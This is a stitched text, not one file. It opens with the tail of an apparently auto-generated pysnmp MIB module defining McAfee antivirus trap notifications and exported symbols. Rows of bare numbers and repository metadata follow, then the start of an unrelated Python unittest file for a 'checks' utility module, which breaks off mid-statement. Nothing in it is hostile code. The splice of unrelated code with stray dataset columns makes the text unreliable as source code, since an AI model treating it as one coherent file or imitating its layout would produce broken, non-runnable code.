"mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EPO_AGENT_WRONG_PLATFORM = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,2216)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mibBuilder.exportSymbols("TVD-MIB", mcafee_MAILCCNAME=mcafee_MAILCCNAME, mcafee_DOMAIN=mcafee_DOMAIN, mcafee_EVENT_TEST_TRAP=mcafee_EVENT_TEST_TRAP, mcafee_EVENT_UPDATE_VERSION_OLDER=mcafee_EVENT_UPDATE_VERSION_OLDER, mcafee_EVENT_MAIL_UPPERDISKLIMIT=mcafee_EVENT_MAIL_UPPERDISKLIMIT, mcafee_EVENT_MAIL_SERVICE_SHUTDOWN_OK=mcafee_EVENT_MAIL_SERVICE_SHUTDOWN_OK, mcafee_EVENT_EPO_AGENT_DISKSPACE=mcafee_EVENT_EPO_AGENT_DISKSPACE, mcafee_EVENT_VIRFOUND=mcafee_EVENT_VIRFOUND, mcafee_EVENT_UPDATECANCELED=mcafee_EVENT_UPDATECANCELED, mcafee_EVENT_FILEEXCLUDING=mcafee_EVENT_FILEEXCLUDING, mcafee_EVENT_DELETED_HEURISTICS=mcafee_EVENT_DELETED_HEURISTICS, mcafee_EVENT_VIRUS_FOUND_IN_MEMORY=mcafee_EVENT_VIRUS_FOUND_IN_MEMORY, mcafee_ACCESSPROCESSNAME=mcafee_ACCESSPROCESSNAME, mcafee_EVENT_SCAN_ITEM_INVALID=mcafee_EVENT_SCAN_ITEM_INVALID, mcafee_CLIENTCOMPUTER=mcafee_CLIENTCOMPUTER, mcafee_OS=mcafee_OS, mcafee_MAILFROMNAME=mcafee_MAILFROMNAME, mcafee_EVENT_MAIL_SERVICE_MAX_LOAD=mcafee_EVENT_MAIL_SERVICE_MAX_LOAD, mcafee_ENGINEVERSION=mcafee_ENGINEVERSION, mcafee_NOTESSERVERNAME=mcafee_NOTESSERVERNAME, mcafee_MAILIDENTIFIERINFO=mcafee_MAILIDENTIFIERINFO, mcafee_TARGETIP=mcafee_TARGETIP, mcafee_EVENT_GEN_SYSTEM_ERROR=mcafee_EVENT_GEN_SYSTEM_ERROR, mcafee_EVENT_CLEANERROR_BOOTSECTOR=mcafee_EVENT_CLEANERROR_BOOTSECTOR, mcafee_EVENT_EPO_FAILE_INSTPRODUCT=mcafee_EVENT_EPO_FAILE_INSTPRODUCT, mcafee_EVENT_SCHED_START_TASK_ERROR=mcafee_EVENT_SCHED_START_TASK_ERROR, mcafee=mcafee, mcafee_NOTESDBNAME=mcafee_NOTESDBNAME, mcafee_EVENT_INFECTION_PASSWORD_PROTECTED=mcafee_EVENT_INFECTION_PASSWORD_PROTECTED, mcafee_EVENT_UPDATE_RUNNING=mcafee_EVENT_UPDATE_RUNNING, mcafee_EVENTNAME=mcafee_EVENTNAME, mcafee_EVENT_SCED_TASK_END_OK=mcafee_EVENT_SCED_TASK_END_OK, mcafee_EVENT_EPO_SPIPE_DISKSPACE=mcafee_EVENT_EPO_SPIPE_DISKSPACE, mcafee_EVENT_TASKERR_LOGFILE=mcafee_EVENT_TASKERR_LOGFILE, mcafeeStandardTrapField=mcafeeStandardTrapField, mcafee_EVENT_MAIL_SERVICE_START=mcafee_EVENT_MAIL_SERVICE_START, 
mcafee_EVENT_OPTIONSERROR=mcafee_EVENT_OPTIONSERROR, mcafee_EVENT_SCAN_REPORT_OS=mcafee_EVENT_SCAN_REPORT_OS, mcafee_EVENT_DIR_ACCESS_ERROR=mcafee_EVENT_DIR_ACCESS_ERROR, mcafee_EVENT_VIRUS_QUARANTINE_FAILURE=mcafee_EVENT_VIRUS_QUARANTINE_FAILURE, mcafee_EVENT_SCAN_CANCELED=mcafee_EVENT_SCAN_CANCELED, mcafee_EVENT_MACRO_VIRUS_DETECTED=mcafee_EVENT_MACRO_VIRUS_DETECTED, mcafee_EVENT_OAS_STOP=mcafee_EVENT_OAS_STOP, mcafee_TASKNAME=mcafee_TASKNAME, mcafee_EVENT_TASK_ERR_MEMALLOC=mcafee_EVENT_TASK_ERR_MEMALLOC, mcafee_EVENT_MAIL_SERVICE_ABEND=mcafee_EVENT_MAIL_SERVICE_ABEND, mcafee_TRAPID=mcafee_TRAPID, mcafee_EVENT_SCHED_TASK_SUCCESS=mcafee_EVENT_SCHED_TASK_SUCCESS, mcafee_GMTTIME=mcafee_GMTTIME, mcafee_EVENT_MAIL_VIRUSQUARANTINED=mcafee_EVENT_MAIL_VIRUSQUARANTINED, mcafee_EVENT_INFECTION_ACESSDENIED=mcafee_EVENT_INFECTION_ACESSDENIED, mcafee_EVENT_UPGRADE_CANCELED=mcafee_EVENT_UPGRADE_CANCELED, mcafee_TSCLIENTID=mcafee_TSCLIENTID, mcafee_EVENT_FILECLEANERROR=mcafee_EVENT_FILECLEANERROR, mcafee_EVENT_MAIL_VIRUS_DETECTED=mcafee_EVENT_MAIL_VIRUS_DETECTED, mcafee_ENGINESTATUS=mcafee_ENGINESTATUS, mcafee_EVENT_UPDATEOK=mcafee_EVENT_UPDATEOK, mcafee_EVENT_MEMALLOC_ERROR=mcafee_EVENT_MEMALLOC_ERROR, mcafee_EVENT_MACRO_VIRUS_DELETED=mcafee_EVENT_MACRO_VIRUS_DELETED, mcafee_EVENT_FILEDELETED=mcafee_EVENT_FILEDELETED, mcafee_EVENT_INTERNAL_APP_ERROR=mcafee_EVENT_INTERNAL_APP_ERROR, mcafee_EVENT_EXCLUDEERR=mcafee_EVENT_EXCLUDEERR, mcafeeTVDTrap=mcafeeTVDTrap, mcafee_EVENT_SERVICE_STARTED_1064=mcafee_EVENT_SERVICE_STARTED_1064, mcafee_EVENT_SCAN_PROC_ERR=mcafee_EVENT_SCAN_PROC_ERR, mcafee_EVENT_MAIL_VIRUS_QUARANTINEDCLEANED=mcafee_EVENT_MAIL_VIRUS_QUARANTINEDCLEANED, mcafee_EVENT_WRITE_PROTECT_ERR=mcafee_EVENT_WRITE_PROTECT_ERR, mcafee_EVENT_MEDIA_NOT_FOUND_ERR=mcafee_EVENT_MEDIA_NOT_FOUND_ERR, mcafee_EVENT_FILE_IO_ERRORS=mcafee_EVENT_FILE_IO_ERRORS, mcafee_EVENT_QUAR_ERROR_HEURISTICS=mcafee_EVENT_QUAR_ERROR_HEURISTICS, mcafee_NOTEID=mcafee_NOTEID, 
mcafee_EVENT_DELETE_ERR_HEURISTICS=mcafee_EVENT_DELETE_ERR_HEURISTICS, mcafee_EVENT_UPGRADE_FAILED=mcafee_EVENT_UPGRADE_FAILED, mcafee_SOURCEIP=mcafee_SOURCEIP, mcafee_EVENT_FILEDELETEERROR=mcafee_EVENT_FILEDELETEERROR, mcafee_EVENT_SCAN_CANCELED_BY_UPD=mcafee_EVENT_SCAN_CANCELED_BY_UPD, mcafee_MAILSUBJECTLINE=mcafee_MAILSUBJECTLINE, mcafee_NUMVIRS=mcafee_NUMVIRS, mcafee_EVENT_MAIL_VIRUS_QUARANTINED=mcafee_EVENT_MAIL_VIRUS_QUARANTINED, mcafee_EVENT_MAIL_VIRUS_FILTERED=mcafee_EVENT_MAIL_VIRUS_FILTERED, mcafee_EVENT_SCAN_TIMEOUT=mcafee_EVENT_SCAN_TIMEOUT, mcafee_EVENT_DISK_IO_ERR=mcafee_EVENT_DISK_IO_ERR, mcafee_EVENT_ODS_SCAN_STARTED=mcafee_EVENT_ODS_SCAN_STARTED, mcafee_EVENT_NEW_MIB=mcafee_EVENT_NEW_MIB, mcafee_EVENT_SCHED_TASK_CANCELED=mcafee_EVENT_SCHED_TASK_CANCELED, mcafee_EVENT_START_PROCESS=mcafee_EVENT_START_PROCESS, mcafee_TIME=mcafee_TIME, mcafee_EVENT_INFECTED_BINDARY=mcafee_EVENT_INFECTED_BINDARY, mcafee_EVENT_MAIL_VIRUSCLEANED=mcafee_EVENT_MAIL_VIRUSCLEANED, mcafee_SCANRETURNCODE=mcafee_SCANRETURNCODE, mcafee_LANGUAGECODE=mcafee_LANGUAGECODE, mcafee_DATVERSION=mcafee_DATVERSION, mcafee_EVENT_OAS_START=mcafee_EVENT_OAS_START, mcafee_EVENT_SERVICE_ENDING_1065=mcafee_EVENT_SERVICE_ENDING_1065, mcafee_EVENT_INFECTED_HEURISTICS=mcafee_EVENT_INFECTED_HEURISTICS, mcafee_EVENT_MAIL_VIRUS_NOTCLEANED=mcafee_EVENT_MAIL_VIRUS_NOTCLEANED, mcafee_EVENT_MAIL_CONTENTBLOCK=mcafee_EVENT_MAIL_CONTENTBLOCK, mcafee_EVENT_UPDATEFAILED=mcafee_EVENT_UPDATEFAILED, mcafee_EVENT_VIRUS_IN_BOOT_RECORD=mcafee_EVENT_VIRUS_IN_BOOT_RECORD, mcafee_EVENT_VIRUS_QUARANTINED=mcafee_EVENT_VIRUS_QUARANTINED, mcafee_NUMQUARANTINED=mcafee_NUMQUARANTINED, mcafee_EVENT_SCED_START_TASK_OK=mcafee_EVENT_SCED_START_TASK_OK, mcafee_EVENT_UPGRADE_RUNNING=mcafee_EVENT_UPGRADE_RUNNING, mcafee_EVENT_MAIL_LOWDISKLIMIT=mcafee_EVENT_MAIL_LOWDISKLIMIT, mcafee_VIRUSNAME=mcafee_VIRUSNAME, mcafee_EVENT_SCHED_TASK_STOP_ERROR=mcafee_EVENT_SCHED_TASK_STOP_ERROR, 
mcafee_EVENT_SCAN_SETTINGS=mcafee_EVENT_SCAN_SETTINGS, mcafee_EVENT_ODS_SCAN_ENDED=mcafee_EVENT_ODS_SCAN_ENDED, mcafee_FILENAME=mcafee_FILENAME, mcafee_MAILTONAME=mcafee_MAILTONAME, mcafee_NUMCLEANED=mcafee_NUMCLEANED, mcafee_PROCESSORSERIAL=mcafee_PROCESSORSERIAL, mcafee_EVENT_EPO_AGENT_WRONG_PLATFORM=mcafee_EVENT_EPO_AGENT_WRONG_PLATFORM, mcafee_NUMDELETED=mcafee_NUMDELETED, mcafee_EVENT_FILECLEANED=mcafee_EVENT_FILECLEANED, mcafee_EVENT_ALERTERROR=mcafee_EVENT_ALERTERROR, mcafee_EVENT_PROCESS_ENDED=mcafee_EVENT_PROCESS_ENDED, mcafee_EVENT_EPO_AGENT_RETRYLIMIT=mcafee_EVENT_EPO_AGENT_RETRYLIMIT, mcafee_EVENT_ALOG_ERROR=mcafee_EVENT_ALOG_ERROR, mcafee_EVENT_SCANEND_NO_VIRUSES=mcafee_EVENT_SCANEND_NO_VIRUSES, mcafee_USERNAME=mcafee_USERNAME, mcafee_EVENT_BOOT_SECTOR_CLEANED=mcafee_EVENT_BOOT_SECTOR_CLEANED, mcafee_OBRULE=mcafee_OBRULE, mcafee_EVENT_SCAN_FOUND_AND_CLEANED_INFECTIONS=mcafee_EVENT_SCAN_FOUND_AND_CLEANED_INFECTIONS, mcafee_EVENT_MAIL_VIRUS_DELETED=mcafee_EVENT_MAIL_VIRUS_DELETED, mcafee_EVENT_SCAN_FOUND_INFECTED_FILES=mcafee_EVENT_SCAN_FOUND_INFECTED_FILES, mcafee_VIRUSTYPE=mcafee_VIRUSTYPE, mcafee_EVENT_QUARANTINED_HEURISTICS=mcafee_EVENT_QUARANTINED_HEURISTICS, mcafee_EVENT_SCANNER_DISABLED=mcafee_EVENT_SCANNER_DISABLED, mcafee_EVENT_NOT_SCANNED_PASSWORD=mcafee_EVENT_NOT_SCANNED_PASSWORD)
| 906.220994
| 7,237
| 0.696237
| 18,894
| 164,026
| 5.819096
| 0.02043
| 0.170866
| 0.341513
| 0.00473
| 0.961699
| 0.949284
| 0.935932
| 0.898095
| 0.894794
| 0.891247
| 0
| 0.015062
| 0.061374
| 164,026
| 180
| 7,238
| 911.255556
| 0.699063
| 0.001878
| 0
| 0
| 0
| 0
| 0.608329
| 0.139498
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.017341
| 0.040462
| 0
| 0.040462
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6c96848e154d88efce3017a206393380b3c02e16
| 68,699
|
py
|
Python
|
src/test/python/thalesians/tsa/testchecks.py
|
saarahrasheed/tsa
|
e4460f707eeecb737663c48d8fc3245f0acb124c
|
[
"Apache-2.0"
] | 117
|
2017-06-30T14:29:32.000Z
|
2022-02-10T00:54:35.000Z
|
src/test/python/thalesians/tsa/testchecks.py
|
saarahrasheed/tsa
|
e4460f707eeecb737663c48d8fc3245f0acb124c
|
[
"Apache-2.0"
] | 2
|
2017-09-01T11:42:14.000Z
|
2017-11-29T20:00:19.000Z
|
src/test/python/thalesians/tsa/testchecks.py
|
saarahrasheed/tsa
|
e4460f707eeecb737663c48d8fc3245f0acb124c
|
[
"Apache-2.0"
] | 37
|
2017-07-05T19:51:10.000Z
|
2021-04-27T00:11:18.000Z
|
import unittest
import thalesians.tsa.checks as checks
class TestConditions(unittest.TestCase):
def test_check(self):
checks.check(True is True)
checks.check(False is False)
checks.check(1 < 3)
checks.check(3 == 3)
checks.check(3 > 1)
with self.assertRaises(AssertionError):
checks.check(True is False)
with self.assertRaises(AssertionError):
checks.check(False is True)
with self.assertRaises(AssertionError):
checks.check(1 >= 3)
with self.assertRaises(AssertionError):
checks.check(3 != 3)
with self.assertRaises(AssertionError):
checks.check(3 <= 1)
def test_check_none(self):
checks.check_none(None)
with self.assertRaises(AssertionError):
checks.check_none(3)
def test_check_not_none(self):
checks.check_not_none(3)
with self.assertRaises(AssertionError):
checks.check_not_none(None)
def test_are_all_not_none(self):
self.assertTrue(checks.are_all_not_none(1, 2, 3))
self.assertFalse(checks.are_all_not_none(None, 2, 3))
self.assertFalse(checks.are_all_not_none(1, None, 3))
self.assertFalse(checks.are_all_not_none(1, 2, None))
self.assertFalse(checks.are_all_not_none(1, None, None))
self.assertFalse(checks.are_all_not_none(None, 2, None))
self.assertFalse(checks.are_all_not_none(None, None, 3))
self.assertTrue(checks.are_all_not_none(1, 2, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(None, 2, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(1, None, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(1, 2, None, 'hi'))
self.assertFalse(checks.are_all_not_none(1, None, None, 'hi'))
self.assertFalse(checks.are_all_not_none(None, 2, None, 'hi'))
self.assertFalse(checks.are_all_not_none(None, None, 3, 'hi'))
self.assertFalse(checks.are_all_not_none(None, None, None))
self.assertFalse(checks.are_all_not_none(None))
def test_check_all_not_none(self):
checks.check_all_not_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, None, 3)
checks.check_all_not_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_not_none(None, None, None)
with self.assertRaises(AssertionError):
checks.check_all_not_none(None)
def test_are_all_none(self):
self.assertFalse(checks.are_all_none(1, 2, 3))
self.assertFalse(checks.are_all_none(None, 2, 3))
self.assertFalse(checks.are_all_none(1, None, 3))
self.assertFalse(checks.are_all_none(1, 2, None))
self.assertFalse(checks.are_all_none(1, 2, 3))
self.assertFalse(checks.are_all_none(1, None, None))
self.assertFalse(checks.are_all_none(None, 2, None))
self.assertFalse(checks.are_all_none(None, None, 3))
self.assertFalse(checks.are_all_none(1, 2, 3, 'hi'))
self.assertFalse(checks.are_all_none(None, 2, 3, 'hi'))
self.assertFalse(checks.are_all_none(1, None, 3, 'hi'))
self.assertFalse(checks.are_all_none(1, 2, None, 'hi'))
self.assertFalse(checks.are_all_none(1, None, None, 'hi'))
self.assertFalse(checks.are_all_none(None, 2, None, 'hi'))
self.assertFalse(checks.are_all_none(None, None, 3, 'hi'))
self.assertTrue(checks.are_all_none(None, None, None))
self.assertTrue(checks.are_all_none(None))
def test_check_all_none(self):
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, None)
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, None)
with self.assertRaises(AssertionError):
checks.check_all_none(None, None, 3)
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_all_none(None, None, 3, 'hi')
checks.check_all_none(None, None, None)
checks.check_all_none(None)
def test_is_exactly_one_not_none(self):
self.assertFalse(checks.is_exactly_one_not_none(1, 2, 3))
self.assertFalse(checks.is_exactly_one_not_none(None, 2, 3))
self.assertFalse(checks.is_exactly_one_not_none(1, None, 3))
self.assertFalse(checks.is_exactly_one_not_none(1, 2, None))
self.assertTrue(checks.is_exactly_one_not_none(1, None, None))
self.assertTrue(checks.is_exactly_one_not_none(None, 2, None))
self.assertTrue(checks.is_exactly_one_not_none(None, None, 3))
self.assertFalse(checks.is_exactly_one_not_none(1, 2, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, 2, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(1, None, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(1, 2, None, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(1, None, None, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, 2, None, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, None, 3, 'hi'))
self.assertFalse(checks.is_exactly_one_not_none(None, None, None))
self.assertFalse(checks.is_exactly_one_not_none(None))
def test_check_exactly_one_not_none(self):
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, 2, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, None, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, None)
checks.check_exactly_one_not_none(1, None, None)
checks.check_exactly_one_not_none(None, 2, None)
checks.check_exactly_one_not_none(None, None, 3)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, 2, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(1, None, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, 2, None, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, None, 3, 'hi')
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None, None, None)
with self.assertRaises(AssertionError):
checks.check_exactly_one_not_none(None)
def test_is_at_least_one_not_none(self):
    """is_at_least_one_not_none is True iff any argument is non-None."""
    base_cases = [
        (1, 2, 3),
        (None, 2, 3),
        (1, None, 3),
        (1, 2, None),
        (1, None, None),
        (None, 2, None),
        (None, None, 3),
    ]
    for args in base_cases:
        self.assertTrue(checks.is_at_least_one_not_none(*args))
        # Appending one more non-None value keeps the predicate True.
        self.assertTrue(checks.is_at_least_one_not_none(*args, 'hi'))
    # Only all-None argument lists are rejected.
    self.assertFalse(checks.is_at_least_one_not_none(None, None, None))
    self.assertFalse(checks.is_at_least_one_not_none(None))
def test_check_at_least_one_not_none(self):
    """check_at_least_one_not_none raises only when every argument is None."""
    base_cases = [
        (1, 2, 3),
        (None, 2, 3),
        (1, None, 3),
        (1, 2, None),
        (1, None, None),
        (None, 2, None),
        (None, None, 3),
    ]
    for args in base_cases:
        checks.check_at_least_one_not_none(*args)
        # A trailing extra non-None argument still satisfies the check.
        checks.check_at_least_one_not_none(*args, 'hi')
    for args in [(None, None, None), (None,)]:
        with self.assertRaises(AssertionError):
            checks.check_at_least_one_not_none(*args)
def test_is_at_most_one_not_none(self):
    """is_at_most_one_not_none is True iff zero or one argument is non-None."""
    singles = [
        (1, None, None),
        (None, 2, None),
        (None, None, 3),
    ]
    multiples = [
        (1, 2, 3),
        (None, 2, 3),
        (1, None, 3),
        (1, 2, None),
    ]
    for args in singles:
        self.assertTrue(checks.is_at_most_one_not_none(*args))
        # Adding a second non-None value tips the count over one.
        self.assertFalse(checks.is_at_most_one_not_none(*args, 'hi'))
    for args in multiples:
        self.assertFalse(checks.is_at_most_one_not_none(*args))
        self.assertFalse(checks.is_at_most_one_not_none(*args, 'hi'))
    # All-None argument lists trivially satisfy "at most one".
    self.assertTrue(checks.is_at_most_one_not_none(None, None, None))
    self.assertTrue(checks.is_at_most_one_not_none(None))
def test_check_at_most_one_not_none(self):
    """check_at_most_one_not_none raises when two or more arguments are non-None."""
    singles = [
        (1, None, None),
        (None, 2, None),
        (None, None, 3),
    ]
    multiples = [
        (1, 2, 3),
        (None, 2, 3),
        (1, None, 3),
        (1, 2, None),
    ]
    for args in singles:
        checks.check_at_most_one_not_none(*args)
        # A second non-None value must trigger the assertion.
        with self.assertRaises(AssertionError):
            checks.check_at_most_one_not_none(*args, 'hi')
    for args in multiples:
        with self.assertRaises(AssertionError):
            checks.check_at_most_one_not_none(*args)
        with self.assertRaises(AssertionError):
            checks.check_at_most_one_not_none(*args, 'hi')
    # All-None argument lists pass trivially.
    checks.check_at_most_one_not_none(None, None, None)
    checks.check_at_most_one_not_none(None)
def test_is_same_len(self):
    """is_same_len compares len() across all arguments; unsized values raise."""
    equal = [
        ([1], ['aaa']),
        ([1, 'b'], ['aaa', 222]),
        ([1, 'b', 3], ['aaa', 222, 'ccc']),
        ([1], ['aaa'], [111]),
        ([1, 'b'], ['aaa', 222], [111, 'BBB']),
        ([1, 'b', 3], ['aaa', 222, 'ccc'], [111, 'BBB', 333]),
    ]
    unequal = [
        ([], ['aaa']),
        ([1], ['aaa', 222]),
        ([1, 'b'], ['aaa']),
        ([], ['aaa'], [111]),
        ([1], ['aaa', 222], [111, 'BBB']),
        ([1, 'b'], ['aaa'], [111, 'BBB']),
    ]
    # Any argument without len() (int, NoneType) propagates TypeError.
    unsized = [
        (1, 'aaa'),
        ([1, 'b'], None),
        (None, ['aaa']),
        (None, None),
        ([1, 'b'], None, ['aaa', 222]),
        (None, ['aaa'], [111]),
        (None, None, [111, 'BBB']),
        (None, None, None),
        ([1], None, ['aaa', 222]),
        (None, ['aaa'], []),
        (None, ['aaa'], [111, 'BBB']),
    ]
    for args in equal:
        self.assertTrue(checks.is_same_len(*args))
    for args in unequal:
        self.assertFalse(checks.is_same_len(*args))
    for args in unsized:
        with self.assertRaises(TypeError):
            checks.is_same_len(*args)
def test_is_same_len_or_none(self):
    """is_same_len_or_none ignores None arguments when comparing lengths."""
    same = [
        ([1], ['aaa']),
        ([1, 'b'], ['aaa', 222]),
        ([1, 'b', 3], ['aaa', 222, 'ccc']),
        ([1], ['aaa'], [111]),
        ([1, 'b'], ['aaa', 222], [111, 'BBB']),
        ([1, 'b', 3], ['aaa', 222, 'ccc'], [111, 'BBB', 333]),
        # None arguments are skipped, so these all count as "same length".
        ([1, 'b'], None),
        (None, ['aaa']),
        (None, None),
        ([1, 'b'], None, ['aaa', 222]),
        (None, ['aaa'], [111]),
        (None, None, [111, 'BBB']),
        (None, None, None),
    ]
    different = [
        ([], ['aaa']),
        ([1], ['aaa', 222]),
        ([1, 'b'], ['aaa']),
        ([], ['aaa'], [111]),
        ([1], ['aaa', 222], [111, 'BBB']),
        ([1, 'b'], ['aaa'], [111, 'BBB']),
        # The remaining non-None arguments still disagree in length.
        ([1], None, ['aaa', 222]),
        (None, ['aaa'], []),
        (None, ['aaa'], [111, 'BBB']),
    ]
    # A sized-less, non-None argument still raises TypeError.
    with self.assertRaises(TypeError):
        checks.is_same_len_or_none(1, 'aaa')
    for args in same:
        self.assertTrue(checks.is_same_len_or_none(*args))
    for args in different:
        self.assertFalse(checks.is_same_len_or_none(*args))
def test_is_same_len_or_all_none(self):
    """is_same_len_or_all_none: equal lengths, or every argument None."""
    accepted = [
        ([1], ['aaa']),
        ([1, 'b'], ['aaa', 222]),
        ([1, 'b', 3], ['aaa', 222, 'ccc']),
        ([1], ['aaa'], [111]),
        ([1, 'b'], ['aaa', 222], [111, 'BBB']),
        ([1, 'b', 3], ['aaa', 222, 'ccc'], [111, 'BBB', 333]),
        # All-None is the only way None may appear and still pass.
        (None, None),
        (None, None, None),
    ]
    rejected = [
        ([], ['aaa']),
        ([1], ['aaa', 222]),
        ([1, 'b'], ['aaa']),
        ([], ['aaa'], [111]),
        ([1], ['aaa', 222], [111, 'BBB']),
        ([1, 'b'], ['aaa'], [111, 'BBB']),
        # Mixing None with non-None values fails, regardless of lengths.
        ([1, 'b'], None),
        (None, ['aaa']),
        ([1, 'b'], None, ['aaa', 222]),
        (None, ['aaa'], [111]),
        (None, None, [111, 'BBB']),
        ([1], None, ['aaa', 222]),
        (None, ['aaa'], []),
        (None, ['aaa'], [111, 'BBB']),
    ]
    # A sized-less, non-None argument still raises TypeError.
    with self.assertRaises(TypeError):
        checks.is_same_len_or_all_none(1, 'aaa')
    for args in accepted:
        self.assertTrue(checks.is_same_len_or_all_none(*args))
    for args in rejected:
        self.assertFalse(checks.is_same_len_or_all_none(*args))
def test_is_instance(self):
    """is_instance mirrors isinstance; None is handled via the allow_none flag."""
    matching = [
